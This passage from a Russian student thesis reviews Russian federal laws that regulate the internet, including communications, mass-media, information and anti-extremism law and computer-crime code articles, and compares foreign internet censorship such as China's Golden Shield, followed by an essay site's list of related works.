2. Операторы связи и застройщики при строительстве и реконструкции зданий, строений, сооружений (в том числе сооружений связи), а также при построении сетей связи должны учитывать необходимость защиты средств связи и сооружений связи от несанкционированного доступа к ним.

3. Операторы связи при эксплуатации сетей связи и сооружений связи обязаны обеспечивать защиту средств связи и сооружений связи от несанкционированного доступа к ним.

К сети Интернет применимо государственное регулирование (статья 21).

Интернет-провайдеры и хостинговые компании находятся под федеральным государственным надзором (статья 27). Соответственно к этим компаниям применимы плановые и внеплановые проверки.

Так же закон дает такие возможности контроля, как лицензирование.

Очень важной статьей так же является статья 64 данного ФЗ, об обязанности операторов связи и ограничение прав пользователей услугами связи при проведении оперативно-розыскных мероприятий, мероприятий по обеспечению безопасности Российской Федерации и осуществлении следственных действий.

Заканчивая рассмотрение данного ФЗ, необходимо акцентировать внимание на 44 статье данного закона. В пункте 3 данной статьи сказано: «В случае нарушения пользователем услугами связи требований, установленных настоящим Федеральным законом, правилами оказания услуг связи или договором об оказании услуг связи, в том числе нарушения сроков оплаты оказанных ему услуг связи, определенных условиями договора об оказании услуг связи, оператор связи имеет право приостановить оказание услуг связи до устранения нарушения, за исключением случаев, установленных настоящим Федеральным законом». Подобные ограничения в принципе применимы и к пользователям и уже применяются в ряде европейских стран.

Следующим законом является 2124-1-ФЗ от 27.12.1991 «О средствах массовой информации» (закон «О СМИ»). И хотя статья 2 данного закона дает четкое определение понятия и массовой информации и СМИ Ст. 2 2124-1 ФЗ под массовой информацией понимаются предназначенные для неограниченного круга лиц печатные, аудио-, аудиовизуальные и иные сообщения и материалы; под средством массовой информации понимается периодическое печатное издание, радио-, теле-, видеопрограмма, кинохроникальная программа, иная форма периодического распространения массовой информации;, в соответствии с которыми сеть Интернет в принципе не относится к СМИ, данный закон так же содержит статью 24, в которой сказано: «Правила, установленные настоящим Законом для радио- и телепрограмм, применяются в отношении периодического распространения массовой информации через системы телетекста, видеотекста и информационно-телекоммуникационные сети, если законодательством Российской Федерации не установлено иное». Это делает возможным применение данного закона в отношении сайтов сети Интернет, позиционирующих себя в качестве информационных или информационно-аналитических порталов, или в качестве независимых информационных агентств.

Существует несколько разъясняющих документов по данному вопросу, первым из которых является Письмо МПТР РФ от 18 ноября 2002 г. N 18/14-16380/18-11218. Информационный ресурс Интернета может считаться средством массовой информации, если отвечает установленным Законом Российской Федерации "О средствах массовой информации требованиям. К информационным ресурсам Интернет, являющимся средствами информации, применимы все нормы действующего законодательства о средствах массовой информации. По информации в письме в 2002 году было официально зарегистрировано 914 Интернет СМИ, на сегодняшний момент, (данные за август 2011 года) из почти 90 тысяч зарегистрированных в реестре http://www.rsoc.ru/mass-communications/reestr/media/p200/?all=1 СМИ числится лишь 477 интернет ресурсов или чуть больше 0,5%. Это объясняется тем, что не один из нормативно-правовых актов РФ не обязывает Интернет ресурсы регистрироваться в качестве СМИ. То есть, является, абсолютно добровольным решением.

Следующим важным законом регулирующим пользование сетью Интернет на территории РФ является - Федеральный закон от 27 июля 2006 г. N 149-ФЗ «Об информации, информационных технологиях и о защите информации».

Статья 2 данного ФЗ вводит основные понятия, дополняющие вводимые в законе «О связи»:

- информационно-телекоммуникационная сеть - технологическая система, предназначенная для передачи по линиям связи информации, доступ к которой осуществляется с использованием средств вычислительной техники;

- информационная система - совокупность содержащейся в базах данных информации и обеспечивающих ее обработку информационных технологий и технических средств

- обладатель информации - лицо, самостоятельно создавшее информацию либо получившее на основании закона или договора право разрешать или ограничивать доступ к информации, определяемой по каким-либо признакам;

- доступ к информации - возможность получения информации и ее использования;

- предоставление информации - действия, направленные на получение информации определенным кругом лиц или передачу информации определенному кругу лиц;

- распространение информации - действия, направленные на получение информации неопределенным кругом лиц или передачу информации неопределенному кругу лиц;

- электронное сообщение - информация, переданная или полученная пользователем информационно-телекоммуникационной сети.

Также в данном законе, в статье 9, вводятся основания ограничения доступа к информации: «Ограничение доступа к информации устанавливается федеральными законами в целях защиты основ конституционного строя, нравственности, здоровья, прав и законных интересов других лиц, обеспечения обороны страны и безопасности государства».

В статье 10 рассматриваются такие важные понятия, как «распространение информации» или «предоставление информации». В частности п. 6. данной статьи гласит: «Запрещается распространение информации, которая направлена на пропаганду войны, разжигание национальной, расовой или религиозной ненависти и вражды, а также иной информации, за распространение которой предусмотрена уголовная или административная ответственность».

Следует также отметить наличие статьи 12 - «Государственное регулирование в сфере применения информационных технологий». Пункт 1 данной статьи гласит: « Государственное регулирование в сфере применения информационных технологий предусматривает: 1) регулирование отношений, связанных с поиском, получением, передачей, производством и распространением информации с применением информационных технологий (информатизации), на основании принципов, установленных настоящим Федеральным законом;». На наш взгляд, эта статья напрямую затрагивает деятельность поисковых систем.

Интересным и важным так же является пункт 6 статьи 13 («Информационные системы»): «Порядок создания и эксплуатации информационных систем, не являющихся государственными информационными системами или муниципальными информационными системами, определяется операторами таких информационных систем в соответствии с требованиями, установленными настоящим Федеральным законом или другими федеральными законами».

Исходя из определения «информационной системы», данного в статье 2 данного закона можно утверждать, что действие данного закона распространяется на социальные сети («Одноклассники», «В контакте» и т.д.), сайты знакомств.

И наконец, в статье 15 данного закона рассмотрены вопросы использования информационно-телекоммуникационных сетей. В контексте данной работы наибольший интерес представляют пункт 1 и 5 данной статьи. В пункте 1 фактически указывается применимость закона «О связи» в отношении информационно-телекоммуникационных сетей, а пункт 5 является логическим дополнением пункта 6 статьи 10, рассмотренного ранее, и говорит о возможности введения ограничений на процесс передачи информации в информационно-телекоммуникационных сетях.

В Федеральном законе № 114-ФЗ от 25 июля 2002 г. «О противодействии экстремистской деятельности» в статье 12 «О недопущении использования сетей связи общего пользования для осуществления экстремистской деятельности» сказано: запрещается использование сетей связи общего пользования для осуществления экстремистской деятельности. К данным сетям, безусловно, в соответствии с законом «О связи», следует отнести сеть Интернет.

Что касается статей, затрагивающих Интернет в различных кодексах, то их не так много, во-первых, в АПК РФ в статье 75 признается возможность использовать документы, полученные с использованием информационно-телекоммуникационной сети "Интернет", однако суд вправе при этом потребовать оригиналы данных документов.

В Уголовном Кодексе в ряде статей затрагивает конкретные действия в сети Интернет, за которые предусмотрена уголовная ответственность:

- статья 171.2. Незаконные организации и проведение азартных игр;

- статья 185.3. Манипулирование рынком.

Глава 28 УК РФ «Преступление в сфере компьютерной информации» содержит три статьи: Статья 272. Неправомерный доступ к компьютерной информации; Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ; Статья 274. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети. 272 и 274 статьи относятся к вопросу защиты данных, косвенно к этому вопросу относится и 273 статья. Появление этой главы в УК РФ в первую очередь обусловлено необходимостью борьбы с таким явлением, как «Хакеры» и направлена она, в первую очередь, на информацию, охраняемую законом.

Кодекс РФ об административных правонарушениях сконцентрировал свое внимания на действия в сети Интернет административных органов:

- статья 7.30. Нарушение порядка размещения заказа на поставки товаров, выполнение работ, оказание услуг для нужд заказчиков

- статья 7.31. Предоставление, опубликование или размещение недостоверной информации о размещении заказов на поставки товаров, выполнение работ, оказание услуг для нужд заказчиков, а также направление недостоверных сведений, внесение их в реестр контрактов, заключенных по итогам размещения заказов, реестр недобросовестных поставщиков;

- статья 13.27. Нарушение требований к организации доступа к информации о деятельности государственных органов и органов местного самоуправления и ее размещению в сети "Интернет".

Также в КоАП содержится статья 14.1.1. Незаконная организация и проведение азартных игр.

К сожалению, многие рациональные предложения, например: дополнить часть 2 статьи 205 УК РФ ("Терроризм") следующим квалифицирующим признаком: «г) с несанкционированным доступом в компьютерные системы или информационно-коммуникационные сети, осуществляющие автоматизированное управление опасными технологическими производствами и предприятиями жизнеобеспечения с целью нарушения их функционирования и создания аварийной ситуации и угрозы техногенной катастрофы, остаются без внимания.

3.2 Мировой опыт в сфере противодействия распространения идей экстремизма и терроризма в сети Интернет

В настоящее время ни в одной из стран мира нет кодифицированного законодательства, регулирующего правоотношения в сети Интернет. Существующие нормативно-правовые акты регулируют частные аспекты функционирования Сети. К ним относятся, прежде всего, вопросы подключения к ней через поставщиков, предоставления соответствующих линий связи и отдельных услуг и т.д. Танимов О.В., Кудашкин Я.В. Перспективы правового регулирования отношений в сети Интернет // Информационное право. 2010. №4..

Переходя непосредственно к рассмотрению опыта иностранных государств в данном вопросе, необходимо привести схему-карту «Ограничения свободы в Интернет», опубликованную в электронной версии «The New York Times» http://www.nytimes.com/ (рисунок 15).

Из карты видно, что данные разбиты на пять категорий:

1. Проникающий (глубокий, возможно абсолютный) контроль;

2. Прочный (но не абсолютный) контроль;

3. Выборочный контроль;

4. Нет ясности;

5. Нет данных.

Если принять данные карты за основу, то Россия отнесена к выборочно контролирующим, то есть у составителей карты были (?) факты, подтверждающие контроль Интернета со стороны государства.

Рисунок 15. Карта ограничения свободы в Интернет

Если сопоставить данную карту с политической картой мира, то создатели карты отнесли к полностью контролирующим сеть Интернет следующие страны: Китай, Иран, Бирму, Вьетнам, Туркмению, Узбекистан, Молдова (однако для Молдовы характерно только наличие одного провайдера на территории государства).

Наиболее ярким представителем данной группы является Китай.

То, что Интернет в Китае контролируется государством ни для кого не секрет, не секрет так же, что степень контроля увеличивается с каждым годом, однако не для всего Китая, а лишь для его материковой части.

В первую очередь, остановимся на техническом аспекте ограничения Интернет в Китае, а именно - проекте «Золотой щит» (The Golden Shield Project) или «Великий Китайский Файрвол». Проект представляет собой систему серверов между провайдерами и международными сетями передачи информации, которая фильтрует информацию, по заранее заданному алгоритму и пресекает доступ к запрещенным Интернет ресурсам.

Таким образом, органы государственной власти Китая блокируют доступ ко многим ресурсам, к таким как, например, очень популярный в России сервис Ютуб.

Важно отметить, что ведущие мировые поисковые системы, работающие в Китае, включая Google, Yahoo и Microsoft (поиск Live Search), согласились фильтровать результаты поиска в соответствии с требованиями Китая, то есть финансовая составляющая, в конечном счете, явилась ключевым фактором присутствия данных систем на рынке.


Подобные документы

  • Вопросы противодействия терроризму и экстремизму в рамках образовательного стандарта учебного курса "Основы безопасности жизнедеятельности". Информационное обеспечение в области антитеррористической деятельности. Профилактика терроризма и экстремизма.

    дипломная работа [670,7 K], добавлен 12.08.2017

  • Изучение понятия терроризма и причин его возникновения. Проблемы борьбы с терроризмом в России, способы защиты от терроризма как угрозы безопасности государства и человека. Внутренние и внешние факторы, влияющие на распространение терроризма в России.

    реферат [46,5 K], добавлен 03.06.2014

  • Общая характеристика химического и биологического терроризма как одной из глобальных проблем человечества. Опасность применения в террористических актах лекарственных препаратов. Состояние и перспективы развития борьбы с данными видами терроризма.

    контрольная работа [44,1 K], добавлен 12.05.2015

  • Способы манипулятивного воздействия на граждан РФ в сети Интернет. Общая характеристики национальной безопасности России как объекта информационного обеспечения, ее особенности, теория, цели, задачи. Технологии манипуляции политическим сознанием молодежи.

    реферат [1,1 M], добавлен 04.05.2015

  • Сущность терроризма, его типы и цели. Правила поведения при теракте. Организация незаконного вооруженного формирования, преступного сообщества. Захват автобуса с детьми. Разрушение Всемирного Торгового Центра. Террористический акт в Москве 2002 года.

    презентация [2,3 M], добавлен 23.10.2013

  • Опасности, с которыми дети могут столкнуться в Сети. Безопасное общение детей в Интернете. Профилактика зависимости у учащихся. Контакты с незнакомыми людьми с помощью чатов или электронной почты. Угроза заражения вредоносным программным обеспечением.

    презентация [2,3 M], добавлен 07.11.2012

  • Характеристики взрываемой технологической металлоконструкции и прилегающей территории, технологии обрушения. Применяемые ВМ и средства взрывания. Транспортировка и доставка ВМ, конструкция и расчет их зарядов. Схема взрывной сети, объем взрывания.

    курсовая работа [1,1 M], добавлен 19.06.2011

  • Нормативно-правовые документы по регулированию безопасности личности. Информатизация общества и проблема информационной безопасности. Источники угроз. Ряд новых проблем, связанных с появлением интернет. Особенность информации как фактора социализации.

    курсовая работа [37,8 K], добавлен 14.01.2014

  • Расчетные расходы воды на пожаротушение. Гидравлический расчет водопроводной сети. Основные требования пожарной безопасности к наружному противопожарному водоснабжению. Составление предварительной расчетной схемы водопроводной сети при пожаротушении.

    курсовая работа [180,7 K], добавлен 02.06.2015

  • Опасность отравления окисью углерода при выполнении работ в глубоких и узких колодцах, канавах. Организация и проведение работ с учетом выделения вредных и ядовитых веществ, при работе с паропроводом и газопроводом. Способы очистки выбросов в атмосферу.

    реферат [456,8 K], добавлен 25.03.2009

Работы в архивах красиво оформлены согласно требованиям ВУЗов и содержат рисунки, диаграммы, формулы и т.д.
PPT, PPTX и PDF-файлы представлены только в архивах.
Рекомендуем скачать работу.